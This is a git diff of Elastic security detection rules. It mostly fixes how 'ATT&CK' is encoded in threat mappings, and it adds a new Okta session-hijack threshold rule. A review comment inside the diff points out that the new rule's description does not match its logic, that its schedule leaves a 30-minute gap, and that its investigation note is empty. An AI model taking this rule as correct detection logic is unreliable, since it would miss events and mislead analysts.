--- a/packages/security_detection_engine/kibana/security_rule/cad4500a-abd7-4ef3-b5d3-95524de7cfe1_206.json
+++ b/packages/security_detection_engine/kibana/security_rule/cad4500a-abd7-4ef3-b5d3-95524de7cfe1_206.json
@@ -70,7 +70,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0040",
 "name": "Impact",
diff --git a/packages/security_detection_engine/kibana/security_rule/cad4500a-abd7-4ef3-b5d3-95524de7cfe1_207.json b/packages/security_detection_engine/kibana/security_rule/cad4500a-abd7-4ef3-b5d3-95524de7cfe1_207.json
index a0b4b5196b2..912695698d5 100644
--- a/packages/security_detection_engine/kibana/security_rule/cad4500a-abd7-4ef3-b5d3-95524de7cfe1_207.json
+++ b/packages/security_detection_engine/kibana/security_rule/cad4500a-abd7-4ef3-b5d3-95524de7cfe1_207.json
@@ -67,7 +67,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0040",
 "name": "Impact",
diff --git a/packages/security_detection_engine/kibana/security_rule/cb71aa62-55c8-42f0-b0dd-afb0bb0b1f51_102.json b/packages/security_detection_engine/kibana/security_rule/cb71aa62-55c8-42f0-b0dd-afb0bb0b1f51_102.json index 6922d8db855..7688a0b1577 100644 --- a/packages/security_detection_engine/kibana/security_rule/cb71aa62-55c8-42f0-b0dd-afb0bb0b1f51_102.json +++ b/packages/security_detection_engine/kibana/security_rule/cb71aa62-55c8-42f0-b0dd-afb0bb0b1f51_102.json @@ -66,7 +66,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/cb71aa62-55c8-42f0-b0dd-afb0bb0b1f51_103.json b/packages/security_detection_engine/kibana/security_rule/cb71aa62-55c8-42f0-b0dd-afb0bb0b1f51_103.json index 81a75fde7ac..2f7f6230f6e 100644 --- a/packages/security_detection_engine/kibana/security_rule/cb71aa62-55c8-42f0-b0dd-afb0bb0b1f51_103.json +++ b/packages/security_detection_engine/kibana/security_rule/cb71aa62-55c8-42f0-b0dd-afb0bb0b1f51_103.json @@ -65,7 +65,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/cb71aa62-55c8-42f0-b0dd-afb0bb0b1f51_104.json b/packages/security_detection_engine/kibana/security_rule/cb71aa62-55c8-42f0-b0dd-afb0bb0b1f51_104.json index b89ad384bfa..27dfe6cd579 100644 --- a/packages/security_detection_engine/kibana/security_rule/cb71aa62-55c8-42f0-b0dd-afb0bb0b1f51_104.json +++ b/packages/security_detection_engine/kibana/security_rule/cb71aa62-55c8-42f0-b0dd-afb0bb0b1f51_104.json @@ -66,7 +66,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", 
diff --git a/packages/security_detection_engine/kibana/security_rule/cb71aa62-55c8-42f0-b0dd-afb0bb0b1f51_105.json b/packages/security_detection_engine/kibana/security_rule/cb71aa62-55c8-42f0-b0dd-afb0bb0b1f51_105.json index 178c11cf763..c1671a9e347 100644 --- a/packages/security_detection_engine/kibana/security_rule/cb71aa62-55c8-42f0-b0dd-afb0bb0b1f51_105.json +++ b/packages/security_detection_engine/kibana/security_rule/cb71aa62-55c8-42f0-b0dd-afb0bb0b1f51_105.json @@ -66,7 +66,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/cc2fd2d0-ba3a-4939-b87f-2901764ed036_102.json b/packages/security_detection_engine/kibana/security_rule/cc2fd2d0-ba3a-4939-b87f-2901764ed036_102.json index 6ff8a47280e..9d01259eec3 100644 --- a/packages/security_detection_engine/kibana/security_rule/cc2fd2d0-ba3a-4939-b87f-2901764ed036_102.json +++ b/packages/security_detection_engine/kibana/security_rule/cc2fd2d0-ba3a-4939-b87f-2901764ed036_102.json @@ -61,7 +61,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/cc2fd2d0-ba3a-4939-b87f-2901764ed036_103.json b/packages/security_detection_engine/kibana/security_rule/cc2fd2d0-ba3a-4939-b87f-2901764ed036_103.json index 823f4191a1a..329b0093048 100644 --- a/packages/security_detection_engine/kibana/security_rule/cc2fd2d0-ba3a-4939-b87f-2901764ed036_103.json +++ b/packages/security_detection_engine/kibana/security_rule/cc2fd2d0-ba3a-4939-b87f-2901764ed036_103.json @@ -60,7 +60,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", 
diff --git a/packages/security_detection_engine/kibana/security_rule/cc2fd2d0-ba3a-4939-b87f-2901764ed036_104.json b/packages/security_detection_engine/kibana/security_rule/cc2fd2d0-ba3a-4939-b87f-2901764ed036_104.json index 356ddaee183..68d8097f559 100644 --- a/packages/security_detection_engine/kibana/security_rule/cc2fd2d0-ba3a-4939-b87f-2901764ed036_104.json +++ b/packages/security_detection_engine/kibana/security_rule/cc2fd2d0-ba3a-4939-b87f-2901764ed036_104.json @@ -61,7 +61,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/cc2fd2d0-ba3a-4939-b87f-2901764ed036_105.json b/packages/security_detection_engine/kibana/security_rule/cc2fd2d0-ba3a-4939-b87f-2901764ed036_105.json index c2846b79868..6d1e6d49c5d 100644 --- a/packages/security_detection_engine/kibana/security_rule/cc2fd2d0-ba3a-4939-b87f-2901764ed036_105.json +++ b/packages/security_detection_engine/kibana/security_rule/cc2fd2d0-ba3a-4939-b87f-2901764ed036_105.json @@ -61,7 +61,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/cc382a2e-7e52-11ee-9aac-f661ea17fbcd_1.json b/packages/security_detection_engine/kibana/security_rule/cc382a2e-7e52-11ee-9aac-f661ea17fbcd_1.json index cacfe88b8c7..be1a3b487c9 100644 --- a/packages/security_detection_engine/kibana/security_rule/cc382a2e-7e52-11ee-9aac-f661ea17fbcd_1.json +++ b/packages/security_detection_engine/kibana/security_rule/cc382a2e-7e52-11ee-9aac-f661ea17fbcd_1.json @@ -65,7 +65,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0001", "name": "Initial Access", 
diff --git a/packages/security_detection_engine/kibana/security_rule/cc382a2e-7e52-11ee-9aac-f661ea17fbcd_2.json b/packages/security_detection_engine/kibana/security_rule/cc382a2e-7e52-11ee-9aac-f661ea17fbcd_2.json
new file mode 100644
index 00000000000..e37c2dd60cb
--- /dev/null
+++ b/packages/security_detection_engine/kibana/security_rule/cc382a2e-7e52-11ee-9aac-f661ea17fbcd_2.json
@@ -0,0 +1,109 @@
+{
+ "attributes": {
+ "author": [
+ "Elastic"
+ ],
+ "description": "Detects when a user has started multiple Okta sessions with the same user account and different session IDs. This may indicate an attacker has compromised a user's Okta account and is using it to access the organization's resources.",
+ "from": "now-30m",
+ "index": [
+ "filebeat-*",
+ "logs-okta*"
+ ],
+ "interval": "60m",
+ "language": "kuery",
+ "license": "Elastic License v2",
+ "name": "Multiple Okta Client Addresses for a Single User Session",
+ "note": "",
+ "query": "event.dataset:okta.system\n and okta.authentication_context.external_session_id:* and okta.debug_context.debug_data.dt_hash:*\n and not (okta.actor.id: okta* or okta.actor.display_name: okta*)\n",
+ "references": [
+ "https://developer.okta.com/docs/reference/api/system-log/",
+ "https://developer.okta.com/docs/reference/api/event-types/",
+ "https://www.elastic.co/security-labs/testing-okta-visibility-and-detection-dorothy",
+ "https://sec.okta.com/articles/2023/08/cross-tenant-impersonation-prevention-and-detection"
+ ],
+ "related_integrations": [
+ {
+ "package": "okta",
+ "version": "^2.0.0"
+ }
+ ],
+ "required_fields": [
+ {
+ "ecs": true,
+ "name": "event.dataset",
+ "type": "keyword"
+ },
+ {
+ "ecs": false,
+ "name": "okta.actor.display_name",
+ "type": "keyword"
+ },
+ {
+ "ecs": false,
+ "name": "okta.actor.id",
+ "type": "keyword"
+ },
+ {
+ "ecs": false,
+ "name": "okta.authentication_context.external_session_id",
+ "type": "keyword"
+ },
+ {
+ "ecs": false,
+ "name": "okta.debug_context.debug_data.dt_hash",
+ "type": "keyword"
+ }
+ ],
+ "risk_score": 47,
+ "rule_id": "cc382a2e-7e52-11ee-9aac-f661ea17fbcd",
+ "setup": "The Okta Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.",
+ "severity": "medium",
+ "tags": [
+ "Use Case: Identity and Access Audit",
+ "Data Source: Okta",
+ "Tactic: Initial Access"
+ ],
+ "threat": [
+ {
+ "framework": "MITRE ATT&CK",
+ "tactic": {
+ "id": "TA0001",
+ "name": "Initial Access",
+ "reference": "https://attack.mitre.org/tactics/TA0001/"
+ },
+ "technique": [
+ {
+ "id": "T1078",
+ "name": "Valid Accounts",
+ "reference": "https://attack.mitre.org/techniques/T1078/",
+ "subtechnique": [
+ {
+ "id": "T1078.004",
+ "name": "Cloud Accounts",
+ "reference": "https://attack.mitre.org/techniques/T1078/004/"
+ }
+ ]
+ }
+ ]
+ }
+ ],
+ "threshold": {
+ "cardinality": [
+ {
+ "field": "okta.debug_context.debug_data.dt_hash",
+ "value": 2
+ }
+ ],
+ "field": [
+ "okta.actor.id",
+ "okta.authentication_context.external_session_id"
+ ],
+ "value": 1
+ },
+ "timestamp_override": "event.ingested",
+ "type": "threshold",
+ "version": 2
+ },
+ "id": "cc382a2e-7e52-11ee-9aac-f661ea17fbcd_2",
+ "type": "security-rule"
+}
\ No newline at end of file
diff --git a/packages/security_detection_engine/kibana/security_rule/cc653d77-ddd2-45b1-9197-c75ad19df66c_1.json b/packages/security_detection_engine/kibana/security_rule/cc653d77-ddd2-45b1-9197-c75ad19df66c_1.json
index 6ab26c79f43..cf677b2eec0 100644
--- a/packages/security_detection_engine/kibana/security_rule/cc653d77-ddd2-45b1-9197-c75ad19df66c_1.json
+++ b/packages/security_detection_engine/kibana/security_rule/cc653d77-ddd2-45b1-9197-c75ad19df66c_1.json
@@ -33,7 +33,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0010",
 "name": "Exfiltration",
diff --git a/packages/security_detection_engine/kibana/security_rule/cc6a8a20-2df2-11ed-8378-f661ea17fbce_104.json b/packages/security_detection_engine/kibana/security_rule/cc6a8a20-2df2-11ed-8378-f661ea17fbce_104.json
index f8f525f997e..c44dff8870a 100644
--- a/packages/security_detection_engine/kibana/security_rule/cc6a8a20-2df2-11ed-8378-f661ea17fbce_104.json
+++ b/packages/security_detection_engine/kibana/security_rule/cc6a8a20-2df2-11ed-8378-f661ea17fbce_104.json
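Review bot: The description of the new rule cc382a2e-…_2 says it fires on "different session IDs", but the threshold groups on `okta.actor.id` and `okta.authentication_context.external_session_id` and counts distinct `okta.debug_context.debug_data.dt_hash` values (cardinality 2), so an alert actually means one session ID was observed with two or more device-token hashes; the name ("Multiple Okta Client Addresses") likewise does not say which field is counted. Suggest rewording to match the logic, e.g. `"description": "Detects an Okta session (same user and external session ID) observed with two or more distinct device token hashes (okta.debug_context.debug_data.dt_hash), which may indicate a session token being reused from another device."`. The schedule also appears to leave a coverage gap: `"from": "now-30m"` with `"interval": "60m"` queries only the most recent 30 minutes on each hourly run, so, if `from` is the query-window start as usual for these rules, events in the other 30 minutes are never evaluated and `from` should presumably be at least the interval plus look-back (e.g. `"from": "now-65m"`). `"note": ""` leaves the investigation guide empty; at minimum it should tell an analyst to compare the dt_hash values, client addresses and user agents across the matching events before deciding whether the session is shared legitimately or hijacked.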
@@ -69,7 +69,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/cc6a8a20-2df2-11ed-8378-f661ea17fbce_105.json b/packages/security_detection_engine/kibana/security_rule/cc6a8a20-2df2-11ed-8378-f661ea17fbce_105.json index ad798ab0a04..c24bdf0a688 100644 --- a/packages/security_detection_engine/kibana/security_rule/cc6a8a20-2df2-11ed-8378-f661ea17fbce_105.json +++ b/packages/security_detection_engine/kibana/security_rule/cc6a8a20-2df2-11ed-8378-f661ea17fbce_105.json @@ -70,7 +70,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/cc6a8a20-2df2-11ed-8378-f661ea17fbce_106.json b/packages/security_detection_engine/kibana/security_rule/cc6a8a20-2df2-11ed-8378-f661ea17fbce_106.json index df28ea06795..2f584146404 100644 --- a/packages/security_detection_engine/kibana/security_rule/cc6a8a20-2df2-11ed-8378-f661ea17fbce_106.json +++ b/packages/security_detection_engine/kibana/security_rule/cc6a8a20-2df2-11ed-8378-f661ea17fbce_106.json @@ -67,7 +67,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/cc89312d-6f47-48e4-a87c-4977bd4633c3_103.json b/packages/security_detection_engine/kibana/security_rule/cc89312d-6f47-48e4-a87c-4977bd4633c3_103.json index d74e0c7dcec..cce0b6aea64 100644 --- a/packages/security_detection_engine/kibana/security_rule/cc89312d-6f47-48e4-a87c-4977bd4633c3_103.json +++ b/packages/security_detection_engine/kibana/security_rule/cc89312d-6f47-48e4-a87c-4977bd4633c3_103.json 
@@ -58,7 +58,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/cc89312d-6f47-48e4-a87c-4977bd4633c3_104.json b/packages/security_detection_engine/kibana/security_rule/cc89312d-6f47-48e4-a87c-4977bd4633c3_104.json index e469a647113..8e56e3a5c4f 100644 --- a/packages/security_detection_engine/kibana/security_rule/cc89312d-6f47-48e4-a87c-4977bd4633c3_104.json +++ b/packages/security_detection_engine/kibana/security_rule/cc89312d-6f47-48e4-a87c-4977bd4633c3_104.json @@ -56,7 +56,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/cc92c835-da92-45c9-9f29-b4992ad621a0_102.json b/packages/security_detection_engine/kibana/security_rule/cc92c835-da92-45c9-9f29-b4992ad621a0_102.json index 744e8f6764f..608db4c2f67 100644 --- a/packages/security_detection_engine/kibana/security_rule/cc92c835-da92-45c9-9f29-b4992ad621a0_102.json +++ b/packages/security_detection_engine/kibana/security_rule/cc92c835-da92-45c9-9f29-b4992ad621a0_102.json @@ -55,7 +55,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/cc92c835-da92-45c9-9f29-b4992ad621a0_103.json b/packages/security_detection_engine/kibana/security_rule/cc92c835-da92-45c9-9f29-b4992ad621a0_103.json index a723cd45792..395be669e62 100644 --- a/packages/security_detection_engine/kibana/security_rule/cc92c835-da92-45c9-9f29-b4992ad621a0_103.json +++ b/packages/security_detection_engine/kibana/security_rule/cc92c835-da92-45c9-9f29-b4992ad621a0_103.json 
@@ -52,7 +52,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/cc92c835-da92-45c9-9f29-b4992ad621a0_104.json b/packages/security_detection_engine/kibana/security_rule/cc92c835-da92-45c9-9f29-b4992ad621a0_104.json index 02338a784c5..73b9275422d 100644 --- a/packages/security_detection_engine/kibana/security_rule/cc92c835-da92-45c9-9f29-b4992ad621a0_104.json +++ b/packages/security_detection_engine/kibana/security_rule/cc92c835-da92-45c9-9f29-b4992ad621a0_104.json @@ -52,7 +52,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/cc92c835-da92-45c9-9f29-b4992ad621a0_105.json b/packages/security_detection_engine/kibana/security_rule/cc92c835-da92-45c9-9f29-b4992ad621a0_105.json index c34562f0c1b..e49d2b1347e 100644 --- a/packages/security_detection_engine/kibana/security_rule/cc92c835-da92-45c9-9f29-b4992ad621a0_105.json +++ b/packages/security_detection_engine/kibana/security_rule/cc92c835-da92-45c9-9f29-b4992ad621a0_105.json @@ -51,7 +51,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/cc92c835-da92-45c9-9f29-b4992ad621a0_106.json b/packages/security_detection_engine/kibana/security_rule/cc92c835-da92-45c9-9f29-b4992ad621a0_106.json index f3b6f324d19..c0a589b9535 100644 --- a/packages/security_detection_engine/kibana/security_rule/cc92c835-da92-45c9-9f29-b4992ad621a0_106.json +++ b/packages/security_detection_engine/kibana/security_rule/cc92c835-da92-45c9-9f29-b4992ad621a0_106.json 
@@ -51,7 +51,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/cc92c835-da92-45c9-9f29-b4992ad621a0_207.json b/packages/security_detection_engine/kibana/security_rule/cc92c835-da92-45c9-9f29-b4992ad621a0_207.json index 3bd3307aa67..e25c34c8b64 100644 --- a/packages/security_detection_engine/kibana/security_rule/cc92c835-da92-45c9-9f29-b4992ad621a0_207.json +++ b/packages/security_detection_engine/kibana/security_rule/cc92c835-da92-45c9-9f29-b4992ad621a0_207.json @@ -51,7 +51,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/ccc55af4-9882-4c67-87b4-449a7ae8079c_103.json b/packages/security_detection_engine/kibana/security_rule/ccc55af4-9882-4c67-87b4-449a7ae8079c_103.json index c4a6c669651..d0f507982d0 100644 --- a/packages/security_detection_engine/kibana/security_rule/ccc55af4-9882-4c67-87b4-449a7ae8079c_103.json +++ b/packages/security_detection_engine/kibana/security_rule/ccc55af4-9882-4c67-87b4-449a7ae8079c_103.json @@ -91,7 +91,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/ccc55af4-9882-4c67-87b4-449a7ae8079c_104.json b/packages/security_detection_engine/kibana/security_rule/ccc55af4-9882-4c67-87b4-449a7ae8079c_104.json index 1de721bc67e..0c6f14c82e6 100644 --- a/packages/security_detection_engine/kibana/security_rule/ccc55af4-9882-4c67-87b4-449a7ae8079c_104.json +++ b/packages/security_detection_engine/kibana/security_rule/ccc55af4-9882-4c67-87b4-449a7ae8079c_104.json 
@@ -90,7 +90,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/ccc55af4-9882-4c67-87b4-449a7ae8079c_105.json b/packages/security_detection_engine/kibana/security_rule/ccc55af4-9882-4c67-87b4-449a7ae8079c_105.json index ae6b2797b99..f59c393a614 100644 --- a/packages/security_detection_engine/kibana/security_rule/ccc55af4-9882-4c67-87b4-449a7ae8079c_105.json +++ b/packages/security_detection_engine/kibana/security_rule/ccc55af4-9882-4c67-87b4-449a7ae8079c_105.json @@ -91,7 +91,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/cd16fb10-0261-46e8-9932-a0336278cdbe_102.json b/packages/security_detection_engine/kibana/security_rule/cd16fb10-0261-46e8-9932-a0336278cdbe_102.json index 5acf563faf8..3986bcaae2d 100644 --- a/packages/security_detection_engine/kibana/security_rule/cd16fb10-0261-46e8-9932-a0336278cdbe_102.json +++ b/packages/security_detection_engine/kibana/security_rule/cd16fb10-0261-46e8-9932-a0336278cdbe_102.json @@ -55,7 +55,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/cd16fb10-0261-46e8-9932-a0336278cdbe_103.json b/packages/security_detection_engine/kibana/security_rule/cd16fb10-0261-46e8-9932-a0336278cdbe_103.json index e6e2f741929..fd164c30965 100644 --- a/packages/security_detection_engine/kibana/security_rule/cd16fb10-0261-46e8-9932-a0336278cdbe_103.json +++ b/packages/security_detection_engine/kibana/security_rule/cd16fb10-0261-46e8-9932-a0336278cdbe_103.json 
@@ -52,7 +52,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/cd16fb10-0261-46e8-9932-a0336278cdbe_104.json b/packages/security_detection_engine/kibana/security_rule/cd16fb10-0261-46e8-9932-a0336278cdbe_104.json index f3583726b64..ce6ed88f2da 100644 --- a/packages/security_detection_engine/kibana/security_rule/cd16fb10-0261-46e8-9932-a0336278cdbe_104.json +++ b/packages/security_detection_engine/kibana/security_rule/cd16fb10-0261-46e8-9932-a0336278cdbe_104.json @@ -51,7 +51,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/cd16fb10-0261-46e8-9932-a0336278cdbe_105.json b/packages/security_detection_engine/kibana/security_rule/cd16fb10-0261-46e8-9932-a0336278cdbe_105.json index ef0f0699523..2732498db3e 100644 --- a/packages/security_detection_engine/kibana/security_rule/cd16fb10-0261-46e8-9932-a0336278cdbe_105.json +++ b/packages/security_detection_engine/kibana/security_rule/cd16fb10-0261-46e8-9932-a0336278cdbe_105.json @@ -51,7 +51,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/cd16fb10-0261-46e8-9932-a0336278cdbe_206.json b/packages/security_detection_engine/kibana/security_rule/cd16fb10-0261-46e8-9932-a0336278cdbe_206.json index 23178e71f2e..57e353e0982 100644 --- a/packages/security_detection_engine/kibana/security_rule/cd16fb10-0261-46e8-9932-a0336278cdbe_206.json +++ b/packages/security_detection_engine/kibana/security_rule/cd16fb10-0261-46e8-9932-a0336278cdbe_206.json 
@@ -51,7 +51,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/cd66a419-9b3f-4f57-8ff8-ac4cd2d5f530_101.json b/packages/security_detection_engine/kibana/security_rule/cd66a419-9b3f-4f57-8ff8-ac4cd2d5f530_101.json index d1c5f525db2..3c9538bb7af 100644 --- a/packages/security_detection_engine/kibana/security_rule/cd66a419-9b3f-4f57-8ff8-ac4cd2d5f530_101.json +++ b/packages/security_detection_engine/kibana/security_rule/cd66a419-9b3f-4f57-8ff8-ac4cd2d5f530_101.json @@ -29,7 +29,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0042", "name": "Resource Development", diff --git a/packages/security_detection_engine/kibana/security_rule/cd66a419-9b3f-4f57-8ff8-ac4cd2d5f530_102.json b/packages/security_detection_engine/kibana/security_rule/cd66a419-9b3f-4f57-8ff8-ac4cd2d5f530_102.json index d0a76f10637..a8c42beb531 100644 --- a/packages/security_detection_engine/kibana/security_rule/cd66a419-9b3f-4f57-8ff8-ac4cd2d5f530_102.json +++ b/packages/security_detection_engine/kibana/security_rule/cd66a419-9b3f-4f57-8ff8-ac4cd2d5f530_102.json @@ -28,7 +28,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0042", "name": "Resource Development", diff --git a/packages/security_detection_engine/kibana/security_rule/cd66a419-9b3f-4f57-8ff8-ac4cd2d5f530_103.json b/packages/security_detection_engine/kibana/security_rule/cd66a419-9b3f-4f57-8ff8-ac4cd2d5f530_103.json index 31a8ed11e8a..f76a6cf0f15 100644 --- a/packages/security_detection_engine/kibana/security_rule/cd66a419-9b3f-4f57-8ff8-ac4cd2d5f530_103.json +++ b/packages/security_detection_engine/kibana/security_rule/cd66a419-9b3f-4f57-8ff8-ac4cd2d5f530_103.json 
@@ -38,7 +38,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0042", "name": "Resource Development", diff --git a/packages/security_detection_engine/kibana/security_rule/cd66a5af-e34b-4bb0-8931-57d0a043f2ef_103.json b/packages/security_detection_engine/kibana/security_rule/cd66a5af-e34b-4bb0-8931-57d0a043f2ef_103.json index fa9db201891..433cd2d2870 100644 --- a/packages/security_detection_engine/kibana/security_rule/cd66a5af-e34b-4bb0-8931-57d0a043f2ef_103.json +++ b/packages/security_detection_engine/kibana/security_rule/cd66a5af-e34b-4bb0-8931-57d0a043f2ef_103.json @@ -61,7 +61,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", @@ -83,7 +83,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/cd66a5af-e34b-4bb0-8931-57d0a043f2ef_104.json b/packages/security_detection_engine/kibana/security_rule/cd66a5af-e34b-4bb0-8931-57d0a043f2ef_104.json index 9ab394e13fb..374ce2a173c 100644 --- a/packages/security_detection_engine/kibana/security_rule/cd66a5af-e34b-4bb0-8931-57d0a043f2ef_104.json +++ b/packages/security_detection_engine/kibana/security_rule/cd66a5af-e34b-4bb0-8931-57d0a043f2ef_104.json @@ -59,7 +59,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", @@ -81,7 +81,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/cd66a5af-e34b-4bb0-8931-57d0a043f2ef_105.json b/packages/security_detection_engine/kibana/security_rule/cd66a5af-e34b-4bb0-8931-57d0a043f2ef_105.json index c546cd3e0f3..0733b90a8ea 100644 
--- a/packages/security_detection_engine/kibana/security_rule/cd66a5af-e34b-4bb0-8931-57d0a043f2ef_105.json +++ b/packages/security_detection_engine/kibana/security_rule/cd66a5af-e34b-4bb0-8931-57d0a043f2ef_105.json @@ -65,7 +65,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", @@ -87,7 +87,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/cd66a5af-e34b-4bb0-8931-57d0a043f2ef_106.json b/packages/security_detection_engine/kibana/security_rule/cd66a5af-e34b-4bb0-8931-57d0a043f2ef_106.json index 546fcd55c19..bdfc342c36b 100644 --- a/packages/security_detection_engine/kibana/security_rule/cd66a5af-e34b-4bb0-8931-57d0a043f2ef_106.json +++ b/packages/security_detection_engine/kibana/security_rule/cd66a5af-e34b-4bb0-8931-57d0a043f2ef_106.json @@ -66,7 +66,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", @@ -88,7 +88,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/cd66a5af-e34b-4bb0-8931-57d0a043f2ef_107.json b/packages/security_detection_engine/kibana/security_rule/cd66a5af-e34b-4bb0-8931-57d0a043f2ef_107.json index 